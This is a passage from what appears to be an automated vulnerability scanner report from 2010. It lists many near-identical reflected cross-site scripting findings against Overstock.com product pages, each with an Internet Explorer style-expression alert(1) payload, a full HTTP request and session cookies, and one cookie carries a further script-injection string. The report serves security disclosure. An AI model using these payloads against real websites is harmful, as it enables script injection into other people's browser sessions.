GET /Luggage-Bags/U.S.-Traveler-RIO-2-piece-Expandable-Carry-on-Luggage-Set/3275005/product.html?3e2b8"style%3d"x%3aexpression(alert(1))"1ea14a637b4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.490. http://www.overstock.com/Main-Street-Revolution/Headbandz-Crochet-Unique-Flower-Headband/5178675/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df93"style%3d"x%3aexpression(alert(1))"87988a1bcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8df93"style="x:expression(alert(1))"87988a1bcf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Main-Street-Revolution/Headbandz-Crochet-Unique-Flower-Headband/5178675/product.html?8df93"style%3d"x%3aexpression(alert(1))"87988a1bcf1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.491. http://www.overstock.com/Office-Furniture/Boss-Caressoft-Reception-Box-Arm-Chair/2201945/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95101"style%3d"x%3aexpression(alert(1))"95b77740904 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95101"style="x:expression(alert(1))"95b77740904 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Boss-Caressoft-Reception-Box-Arm-Chair/2201945/product.html?95101"style%3d"x%3aexpression(alert(1))"95b77740904=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.492. http://www.overstock.com/Office-Furniture/Boss-Lumbar-Support-Executive-Chair/2377844/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f394d"style%3d"x%3aexpression(alert(1))"10935635af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f394d"style="x:expression(alert(1))"10935635af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Boss-Lumbar-Support-Executive-Chair/2377844/product.html?f394d"style%3d"x%3aexpression(alert(1))"10935635af=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.493. http://www.overstock.com/Office-Furniture/Boss-Mesh-Back-Task-Chair/2958050/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cb6f"style%3d"x%3aexpression(alert(1))"4f40dc6b211 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cb6f"style="x:expression(alert(1))"4f40dc6b211 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Boss-Mesh-Back-Task-Chair/2958050/product.html?2cb6f"style%3d"x%3aexpression(alert(1))"4f40dc6b211=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.494. http://www.overstock.com/Office-Furniture/Boss-NTR-Executive-Leather-Chair/3187832/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f559"style%3d"x%3aexpression(alert(1))"cd9f62b239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f559"style="x:expression(alert(1))"cd9f62b239 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Boss-NTR-Executive-Leather-Chair/3187832/product.html?6f559"style%3d"x%3aexpression(alert(1))"cd9f62b239=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.495. http://www.overstock.com/Office-Furniture/Ergo-Mesh-High-back-Executive-Chair/3082638/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5dc3"style%3d"x%3aexpression(alert(1))"767f7a053e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5dc3"style="x:expression(alert(1))"767f7a053e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Ergo-Mesh-High-back-Executive-Chair/3082638/product.html?b5dc3"style%3d"x%3aexpression(alert(1))"767f7a053e7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.496. http://www.overstock.com/Office-Furniture/Ergo-Value-Mesh-Medium-Back-Task-Chair/3861788/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa14f"style%3d"x%3aexpression(alert(1))"7e0b5c055a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa14f"style="x:expression(alert(1))"7e0b5c055a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Ergo-Value-Mesh-Medium-Back-Task-Chair/3861788/product.html?fa14f"style%3d"x%3aexpression(alert(1))"7e0b5c055a6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.497. http://www.overstock.com/Office-Furniture/Lifetime-4-foot-Adjustable-Height-Fold-in-half-Table/4579208/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2320"style%3d"x%3aexpression(alert(1))"3a5053173 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2320"style="x:expression(alert(1))"3a5053173 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Lifetime-4-foot-Adjustable-Height-Fold-in-half-Table/4579208/product.html?c2320"style%3d"x%3aexpression(alert(1))"3a5053173=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.498. http://www.overstock.com/Office-Furniture/Lifetime-Black-Personal-Folding-Table/4721849/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87227"style%3d"x%3aexpression(alert(1))"febd37c97e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87227"style="x:expression(alert(1))"febd37c97e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Lifetime-Black-Personal-Folding-Table/4721849/product.html?87227"style%3d"x%3aexpression(alert(1))"febd37c97e7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.499. http://www.overstock.com/Office-Furniture/Office-Star-Professional-Air-Grid-Deluxe-Task-Chair/2605023/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 137d2"style%3d"x%3aexpression(alert(1))"7b0d2802d84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 137d2"style="x:expression(alert(1))"7b0d2802d84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Furniture/Office-Star-Professional-Air-Grid-Deluxe-Task-Chair/2605023/product.html?137d2"style%3d"x%3aexpression(alert(1))"7b0d2802d84=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.500. http://www.overstock.com/Office-Supplies/Brother-LC51-Compatible-Deluxe-Ink-Combo-Pack-of-5/2667500/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6022"style%3d"x%3aexpression(alert(1))"6717bda0485 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6022"style="x:expression(alert(1))"6717bda0485 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Brother-LC51-Compatible-Deluxe-Ink-Combo-Pack-of-5/2667500/product.html?b6022"style%3d"x%3aexpression(alert(1))"6717bda0485=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.501. http://www.overstock.com/Office-Supplies/Cool-Lift-Laptop-Computer-Cooling-Stand/2543946/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e710"style%3d"x%3aexpression(alert(1))"1f5392456f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e710"style="x:expression(alert(1))"1f5392456f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Cool-Lift-Laptop-Computer-Cooling-Stand/2543946/product.html?2e710"style%3d"x%3aexpression(alert(1))"1f5392456f3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.502. http://www.overstock.com/Office-Supplies/Cork-Wall-Tiles-Pack-of-4/4239510/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b73"style%3d"x%3aexpression(alert(1))"7d91e576ae5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90b73"style="x:expression(alert(1))"7d91e576ae5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Cork-Wall-Tiles-Pack-of-4/4239510/product.html?90b73"style%3d"x%3aexpression(alert(1))"7d91e576ae5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.503. http://www.overstock.com/Office-Supplies/Cross-Cut-Shredder/4761404/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99400"style%3d"x%3aexpression(alert(1))"b8b5d35490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99400"style="x:expression(alert(1))"b8b5d35490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
